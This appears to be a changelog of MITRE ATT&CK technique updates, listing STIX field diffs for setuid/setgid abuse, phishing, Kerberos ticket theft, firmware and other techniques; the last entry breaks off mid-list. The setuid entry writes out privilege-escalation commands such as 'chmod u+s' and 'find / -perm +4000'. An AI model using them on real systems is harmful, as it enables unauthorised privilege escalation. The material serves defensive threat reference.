An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgit bit, chmod 2775 and chmod g+s can be used. Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions. Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)

New Description

An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used. Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions. Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)

The only textual change is the typo fix "setgit" to "setgid" in the sentence on enabling the setgid bit.

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-19 15:07:53.060000+00:00 | 2023-03-15 18:43:20.995000+00:00
description | (Old Description above) | (New Description above)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | File: File Modification | File: File Metadata
x_mitre_data_sources[1] | File: File Metadata | File: File Modification

[T1547.009] Boot or Logon Autostart Execution: Shortcut Modification

Current version: 1.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-19 22:29:46.175000+00:00 | 2023-03-30 21:01:49.848000+00:00
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources | | Process: Process Creation
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/132.html', 'external_id': 'CAPEC-132'} |
x_mitre_data_sources | Process: Process Creation |

[T1072] Software Deployment Tools

Current version: 2.1

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
values_changed
STIX Field | Old value | New Value
modified | 2020-12-11 17:00:00.938000+00:00 | 2023-03-30 21:01:36.669000+00:00
x_mitre_data_sources[0] | Process: Process Creation | Application Log: Application Log Content
x_mitre_data_sources[1] | Application Log: Application Log Content | Process: Process Creation
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/187.html', 'external_id': 'CAPEC-187'} |

[T1518] Software Discovery

Current version: 1.3

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
values_changed
STIX Field | Old value | New Value
modified | 2022-01-29 00:02:24.150000+00:00 | 2023-03-30 21:01:50.920000+00:00
x_mitre_data_sources[1] | Firewall: Firewall Enumeration | Firewall: Firewall Metadata
x_mitre_data_sources[3] | Firewall: Firewall Metadata | Process: Process Creation
x_mitre_data_sources[4] | Process: Process Creation | Firewall: Firewall Enumeration
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/580.html', 'external_id': 'CAPEC-580'} |

[T1027.002] Obfuscated Files or Information: Software Packing

Current version: 1.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-19 02:09:27.046000+00:00 | 2023-03-30 21:01:48.113000+00:00
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/570.html', 'external_id': 'CAPEC-570'} |

[T1036.006] Masquerading: Space after Filename

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-649 |
values_changed
STIX Field | Old value | New Value
modified | 2020-03-29 20:26:01.690000+00:00 | 2023-03-30 21:01:52.873000+00:00
external_references[1]['source_name'] | capec | Mac Backdoors are back
external_references[1]['url'] | https://capec.mitre.org/data/definitions/649.html | https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Mac Backdoors are back', 'description': 'Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.', 'url': 'https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/'} |

[T1566.001] Phishing: Spearphishing Attachment

Current version: 2.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-163 |
values_changed
STIX Field | Old value | New Value
modified | 2021-10-18 17:39:12.452000+00:00 | 2023-03-30 21:01:42.995000+00:00
external_references[1]['source_name'] | capec | Microsoft Anti Spoofing
external_references[1]['url'] | https://capec.mitre.org/data/definitions/163.html | https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
external_references[2]['source_name'] | Microsoft Anti Spoofing | ACSC Email Spoofing
external_references[2]['description'] | Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
external_references[2]['url'] | https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
external_references[3]['source_name'] | ACSC Email Spoofing | Elastic - Koadiac Detection with EQL
external_references[3]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.
external_references[3]['url'] | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf | https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql
x_mitre_data_sources[0] | Application Log: Application Log Content | Network Traffic: Network Traffic Content
x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Application Log: Application Log Content
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Elastic - Koadiac Detection with EQL', 'description': 'Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.', 'url': 'https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql'} |

[T1566.003] Phishing: Spearphishing via Service

Current version: 2.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
values_changed
STIX Field | Old value | New Value
modified | 2020-10-18 01:55:02.988000+00:00 | 2023-03-30 21:01:50.401000+00:00
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/163.html', 'external_id': 'CAPEC-163'} |

[T1132.001] Data Encoding: Standard Encoding

Current version: 1.0


Old Description
Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

New Description
Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
dictionary_item_removed
STIX Field | Old value | New Value
x_mitre_permissions_required | ['User'] |
values_changed
STIX Field | Old value | New Value
modified | 2020-03-14 23:36:52.095000+00:00 | 2023-03-03 00:31:33.071000+00:00
description | Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip. | Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.
external_references[1]['source_name'] | Wikipedia Binary-to-text Encoding | University of Birmingham C2
external_references[1]['description'] | Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017. | Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
external_references[1]['url'] | https://en.wikipedia.org/wiki/Binary-to-text_encoding | https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
external_references[2]['source_name'] | Wikipedia Character Encoding | Wikipedia Binary-to-text Encoding
external_references[2]['description'] | Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017. | Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.
external_references[2]['url'] | https://en.wikipedia.org/wiki/Character_encoding | https://en.wikipedia.org/wiki/Binary-to-text_encoding
external_references[3]['source_name'] | University of Birmingham C2 | Wikipedia Character Encoding
external_references[3]['description'] | Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. | Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.
external_references[3]['url'] | https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf | https://en.wikipedia.org/wiki/Character_encoding

[T1558] Steal or Forge Kerberos Tickets

Current version: 1.4

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s Secret Decoder Ring. Retrieved February 27, 2020.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-652 |
values_changed
STIX Field | Old value | New Value
modified | 2022-03-08 21:45:01.934000+00:00 | 2023-03-30 21:01:50.214000+00:00
external_references[1]['source_name'] | capec | ADSecurity Kerberos Ring Decoder
external_references[1]['url'] | https://capec.mitre.org/data/definitions/652.html | https://adsecurity.org/?p=227
external_references[2]['source_name'] | ADSecurity Kerberos Ring Decoder | Microsoft Klist
external_references[2]['description'] | Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s Secret Decoder Ring. Retrieved February 27, 2020. | Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.
external_references[2]['url'] | https://adsecurity.org/?p=227 | https://docs.microsoft.com/windows-server/administration/windows-commands/klist
external_references[3]['source_name'] | Microsoft Klist | MIT ccache
external_references[3]['description'] | Microsoft. (2021, March 3). klist. Retrieved October 14, 2021. | Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021.
external_references[3]['url'] | https://docs.microsoft.com/windows-server/administration/windows-commands/klist | https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
external_references[4]['source_name'] | MIT ccache | Linux Kerberos Tickets
external_references[4]['description'] | Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021. | Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021.
external_references[4]['url'] | https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html | https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
external_references[5]['source_name'] | Linux Kerberos Tickets | Brining MimiKatz to Unix
external_references[5]['description'] | Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021. | Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.
external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html | https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
external_references[6]['source_name'] | Brining MimiKatz to Unix | Kekeo
external_references[6]['description'] | Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021. | Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
external_references[6]['url'] | https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf | https://github.com/gentilkiwi/kekeo
external_references[7]['source_name'] | Kekeo | SpectorOps Bifrost Kerberos macOS 2019
external_references[7]['description'] | Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021. | Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021.
external_references[7]['url'] | https://github.com/gentilkiwi/kekeo | https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
external_references[8]['source_name'] | SpectorOps Bifrost Kerberos macOS 2019 | macOS kerberos framework MIT
external_references[8]['description'] | Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021. | Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021.
external_references[8]['url'] | https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f | http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
external_references[9]['source_name'] | macOS kerberos framework MIT | ADSecurity Detecting Forged Tickets
external_references[9]['description'] | Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021. | Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.
external_references[9]['url'] | http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html | https://adsecurity.org/?p=1515
external_references[10]['source_name'] | ADSecurity Detecting Forged Tickets | Stealthbits Detect PtT 2019
external_references[10]['description'] | Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015. | Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.
external_references[10]['url'] | https://adsecurity.org/?p=1515 | https://blog.stealthbits.com/detect-pass-the-ticket-attacks
external_references[11]['source_name'] | Stealthbits Detect PtT 2019 | CERT-EU Golden Ticket Protection
external_references[11]['description'] | Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020. | Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
external_references[11]['url'] | https://blog.stealthbits.com/detect-pass-the-ticket-attacks | https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
external_references[12]['source_name'] | CERT-EU Golden Ticket Protection | Microsoft Kerberos Golden Ticket
external_references[12]['description'] | Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017. | Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.
external_references[12]['url'] | https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf | https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
external_references[13]['source_name'] | Microsoft Kerberos Golden Ticket | Microsoft Detecting Kerberoasting Feb 2018
external_references[13]['description'] | Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020. | Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.
external_references[13]['url'] | https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285 | https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
external_references[14]['source_name'] | Microsoft Detecting Kerberoasting Feb 2018 | AdSecurity Cracking Kerberos Dec 2015
external_references[14]['description'] | Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018. | Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.
external_references[14]['url'] | https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/ | https://adsecurity.org/?p=2293
external_references[15]['source_name'] | AdSecurity Cracking Kerberos Dec 2015 | Medium Detecting Attempts to Steal Passwords from Memory
external_references[15]['description'] | Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018. | French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.
external_references[15]['url'] | https://adsecurity.org/?p=2293 | https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
x_mitre_data_sources[0] | Command: Command Execution | Active Directory: Active Directory Credential Request
x_mitre_data_sources[1] | Logon Session: Logon Session Metadata | File: File Access
x_mitre_data_sources[2] | Active Directory: Active Directory Credential Request | Command: Command Execution
x_mitre_data_sources[3] | File: File Access | Logon Session: Logon Session Metadata
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Medium Detecting Attempts to Steal Passwords from Memory', 'description': 'French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.', 'url': 'https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea'} |

[T1027.003] Obfuscated Files or Information: Steganography

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-636 |
values_changed
STIX Field | Old value | New Value
modified | 2021-10-15 16:46:56.760000+00:00 | 2023-03-30 21:01:48.815000+00:00
external_references[1]['source_name'] | capec | Wikipedia Duqu
external_references[1]['url'] | https://capec.mitre.org/data/definitions/636.html | https://en.wikipedia.org/wiki/Duqu
external_references[2]['source_name'] | Wikipedia Duqu | McAfee Malicious Doc Targets Pyeongchang Olympics
external_references[2]['description'] | Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018. | Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.
external_references[2]['url'] | https://en.wikipedia.org/wiki/Duqu | https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'McAfee Malicious Doc Targets Pyeongchang Olympics', 'description': 'Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.', 'url': 'https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/'} |

[T1195] Supply Chain Compromise

Current version: 1.5

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-28 16:03:22.870000+00:00 | 2023-03-30 21:01:42.446000+00:00
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/437.html', 'external_id': 'CAPEC-437'} |
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/438.html', 'external_id': 'CAPEC-438'} |
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/439.html', 'external_id': 'CAPEC-439'} |

[T1542.001] Pre-OS Boot: System Firmware

Current version: 1.0

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-532 |
values_changed
STIX Field | Old value | New Value
modified | 2020-05-19 21:22:37.865000+00:00 | 2023-03-30 21:01:49.493000+00:00
external_references[1]['source_name'] | capec | Wikipedia BIOS
external_references[1]['url'] | https://capec.mitre.org/data/definitions/532.html | https://en.wikipedia.org/wiki/BIOS
external_references[2]['source_name'] | Wikipedia BIOS | Wikipedia UEFI
external_references[2]['description'] | Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016. | Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.
external_references[2]['url'] | https://en.wikipedia.org/wiki/BIOS | https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface
external_references[3]['source_name'] | Wikipedia UEFI | About UEFI
external_references[3]['description'] | Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017. | UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.
external_references[3]['url'] | https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface | http://www.uefi.org/about
external_references[4]['source_name'] | About UEFI | MITRE Trustworthy Firmware Measurement
external_references[4]['description'] | UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016. | Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.
external_references[4]['url'] | http://www.uefi.org/about | http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research
external_references[5]['source_name'] | MITRE Trustworthy Firmware Measurement | MITRE Copernicus
external_references[5]['description'] | Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016. | Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.
external_references[5]['url'] | http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research | http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about
external_references[6]['source_name'] | MITRE Copernicus | McAfee CHIPSEC Blog
external_references[6]['description'] | Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015. | Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.
external_references[6]['url'] | http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about | https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/
external_references[7]['source_name'] | McAfee CHIPSEC Blog | Github CHIPSEC
external_references[7]['description'] | Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017. | Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.
external_references[7]['url'] | https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/ | https://github.com/chipsec/chipsec
external_references[8]['source_name'] | Github CHIPSEC | Intel HackingTeam UEFI Rootkit
external_references[8]['description'] | Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017. | Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.
external_references[8]['url'] | https://github.com/chipsec/chipsec | http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Intel HackingTeam UEFI Rootkit', 'description': "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", 'url': 'http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html'} |

[T1082] System Information Discovery

Current version: 2.5

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-06 22:11:56.413000+00:00 | 2023-03-30 21:01:40.871000+00:00
x_mitre_data_sources[0] | Process: OS API Execution | Command: Command Execution
x_mitre_data_sources[2] | Command: Command Execution | Process: OS API Execution
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/312.html', 'external_id': 'CAPEC-312'} |

[T1016] System Network Configuration Discovery

Current version: 1.5

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-06 22:32:35.833000+00:00 | 2023-03-30 21:01:38.842000+00:00
x_mitre_data_sources[0] | Command: Command Execution | Process: Process Creation
x_mitre_data_sources[1] | Script: Script Execution | Command: Command Execution
x_mitre_data_sources[2] | Process: Process Creation | Process: OS API Execution
x_mitre_data_sources[3] | Process: OS API Execution | Script: Script Execution
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/309.html', 'external_id': 'CAPEC-309'} |

[T1080] Taint Shared Content

Current version: 1.3

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | Routin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-562 |
values_changed
STIX Field | Old value | New Value
modified | 2021-10-17 14:12:33.188000+00:00 | 2023-03-30 21:01:36.145000+00:00
external_references[1]['source_name'] | capec | Retwin Directory Share Pivot
external_references[1]['url'] | https://capec.mitre.org/data/definitions/562.html | https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources | | Process: Process Creation
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Retwin Directory Share Pivot', 'description': 'Routin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018.', 'url': 'https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html'} |
x_mitre_data_sources | Process: Process Creation |

[T1021.005] Remote Services: VNC

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-555 |
values_changed
STIX Field | Old value | New Value
modified | 2021-10-07 22:14:25.528000+00:00 | 2023-03-30 21:01:46.879000+00:00
external_references[1]['source_name'] | capec | The Remote Framebuffer Protocol
external_references[1]['url'] | https://capec.mitre.org/data/definitions/555.html | https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
external_references[2]['source_name'] | The Remote Framebuffer Protocol | MacOS VNC software for Remote Desktop
external_references[2]['description'] | T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021. | Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.
external_references[2]['url'] | https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2 | https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
external_references[3]['source_name'] | MacOS VNC software for Remote Desktop | VNC Authentication
